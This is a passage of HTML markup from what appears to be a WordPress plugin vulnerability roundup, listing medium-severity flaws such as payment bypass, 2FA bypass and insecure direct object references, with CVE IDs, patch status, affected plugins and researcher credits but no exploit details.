		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df06f6c7-98b8-4d17-aa53-c5f13ada7c62" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6ab93ea4-4d15-43cb-be70-6eb4921194d1" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor &lt; 1.7.1066 &#8211; Unauthenticated Like Count Manipulation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13404" target="_blank" rel="noopener noreferrer">							CVE-2026-13404						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor</a> <span class="wfvr-software-slug">[royal-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6ab93ea4-4d15-43cb-be70-6eb4921194d1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5ce8f128-78c6-4118-a178-0c163c55b07d" target="_blank" rel="noopener">Security Optimizer – The All-In-One Protection Plugin &lt;= 1.6.6 &#8211; 2-Factor Authentication Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82228" target="_blank" rel="noopener noreferrer">							CVE-2026-82228						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sg-security" target="_blank" rel="noopener">Security Optimizer – The All-In-One Protection Plugin</a> <span class="wfvr-software-slug">[sg-security]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5ce8f128-78c6-4118-a178-0c163c55b07d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03288d4e-22cc-4995-a473-9eb0f90b91b2" target="_blank" rel="noopener">Shared Files Pro &lt; 1.7.70 &amp; Shared Files Free &lt; 1.7.67 &#8211; Unauthenticated Limited File Upload</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12514" target="_blank" rel="noopener noreferrer">							CVE-2026-12514						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shared-files" target="_blank" rel="noopener">Shared Files – File Upload &amp; Download Manager</a> <span class="wfvr-software-slug">[shared-files]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shared-files-pro" target="_blank" rel="noopener">Shared Files Pro</a> <span class="wfvr-software-slug">[shared-files-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoangphuong" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7281b22ecfa0daa444618787ac0114ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7281b22ecfa0daa444618787ac0114ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoangphuong" target="_blank" rel="noopener">hoangphuong</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03288d4e-22cc-4995-a473-9eb0f90b91b2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2018255-b0c7-4982-9df0-7ce722c0112b" target="_blank" rel="noopener">Simple Newsletter Plugin – Noptin &lt; 4.3.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78146" target="_blank" rel="noopener noreferrer">							CVE-2026-78146						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter-optin-box" target="_blank" rel="noopener">Simple Newsletter Plugin – Noptin</a> <span class="wfvr-software-slug">[newsletter-optin-box]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2018255-b0c7-4982-9df0-7ce722c0112b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ea78b7b2-039d-41dc-a465-fb9462ed32ae" target="_blank" rel="noopener">Simple Payment &lt;= 2.5.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81767" target="_blank" rel="noopener noreferrer">							CVE-2026-81767						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-payment" target="_blank" rel="noopener">Simple Payment</a> <span class="wfvr-software-slug">[simple-payment]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ea78b7b2-039d-41dc-a465-fb9462ed32ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/29a45e1b-f33a-46ff-8a42-b5b0c07d90d6" target="_blank" rel="noopener">StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce &lt; 2.1.2 &#8211; Unauthenticated Arbitrary Price Manipulation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78137" target="_blank" rel="noopener noreferrer">							CVE-2026-78137						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</a> <span class="wfvr-software-slug">[storegrowth-sales-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/29a45e1b-f33a-46ff-8a42-b5b0c07d90d6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f174044a-7ec3-4b25-90d1-49dfe93ff8ac" target="_blank" rel="noopener">Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations &amp; Subscriptions &lt; 8.5.1 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77758" target="_blank" rel="noopener noreferrer">							CVE-2026-77758						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-full-stripe-free" target="_blank" rel="noopener">Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations &amp; Subscriptions</a> <span class="wfvr-software-slug">[wp-full-stripe-free]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f174044a-7ec3-4b25-90d1-49dfe93ff8ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5f64768-fbb0-4653-b9ce-09f1290ab604" target="_blank" rel="noopener">Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations &amp; Subscriptions &lt; 8.5.1 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77789" target="_blank" rel="noopener noreferrer">							CVE-2026-77789						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-full-stripe-free" target="_blank" rel="noopener">Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations &amp; Subscriptions</a> <span class="wfvr-software-slug">[wp-full-stripe-free]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5f64768-fbb0-4653-b9ce-09f1290ab604" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/41f6c1da-381d-4dd6-a68f-b5511d3e5a1f" target="_blank" rel="noopener">Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations &amp; Subscriptions &lt; 8.5.5 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80311" target="_blank" rel="noopener noreferrer">							CVE-2026-80311						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-full-stripe-free" target="_blank" rel="noopener">Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations &amp; Subscriptions</a> <span class="wfvr-software-slug">[wp-full-stripe-free]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/41f6c1da-381d-4dd6-a68f-b5511d3e5a1f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c2fc3d97-0aac-47f6-b0d9-968303341033" target="_blank" rel="noopener">Tamara Checkout &lt;= 1.9.9.20 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16962" target="_blank" rel="noopener noreferrer">							CVE-2026-16962						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tamara-checkout" target="_blank" rel="noopener">Tamara Checkout</a> <span class="wfvr-software-slug">[tamara-checkout]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ezekiel-victor" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/26f3449f5fd6f5b863626494f64fdb7e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26f3449f5fd6f5b863626494f64fdb7e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ezekiel-victor" target="_blank" rel="noopener">Ezekiel Victor</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c2fc3d97-0aac-47f6-b0d9-968303341033" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09adad1b-3678-487a-9e37-579fec938c14" target="_blank" rel="noopener">User Frontend – Membership, User Registration, User Profile, User Directory &amp; Content Restriction with Frontend Post Submission &lt; 4.3.10 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14567" target="_blank" rel="noopener noreferrer">							CVE-2026-14567						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-frontend" target="_blank" rel="noopener">User Frontend – Membership, User Registration, User Profile, User Directory &amp; Content Restriction with Frontend Post Submission</a> <span class="wfvr-software-slug">[wp-user-frontend]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09adad1b-3678-487a-9e37-579fec938c14" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc250014-98ec-4d21-8084-551c365c2223" target="_blank" rel="noopener">WCFM Marketplace – Multivendor Marketplace for WooCommerce &lt; 3.8.2 &#8211; Insecure Direct Object Reference to Unauthenticated Arbitrary Order Refund Request</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77701" target="_blank" rel="noopener noreferrer">							CVE-2026-77701						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-multivendor-marketplace" target="_blank" rel="noopener">WCFM Marketplace – Multivendor Marketplace for WooCommerce</a> <span class="wfvr-software-slug">[wc-multivendor-marketplace]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc250014-98ec-4d21-8084-551c365c2223" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/935f5d76-d63a-4db4-b645-b7961ae8bfaf" target="_blank" rel="noopener">WP Data Access – No-Code App Builder with Tables, Forms, Charts &amp; Maps &lt;= 5.5.68 &#8211; Unauthenticated Insecure Direct Object Reference to Data Access</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-3235" target="_blank" rel="noopener noreferrer">							CVE-2026-3235						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-data-access" target="_blank" rel="noopener">WP Data Access – App Builder for Tables, Forms, Charts, Maps &amp; Dashboards</a> <span class="wfvr-software-slug">[wp-data-access]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/m-indra-purnama-zzkiel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b596eef6275fcf70c058035885683275.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b596eef6275fcf70c058035885683275"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/m-indra-purnama-zzkiel" target="_blank" rel="noopener">type5afe</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/935f5d76-d63a-4db4-b645-b7961ae8bfaf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e5f792b-feb3-442a-ad23-d09c618a4677" target="_blank" rel="noopener">WP OAuth Server ( Login with WordPress ) &lt; 6.3.1 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19715" target="_blank" rel="noopener noreferrer">							CVE-2026-19715						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
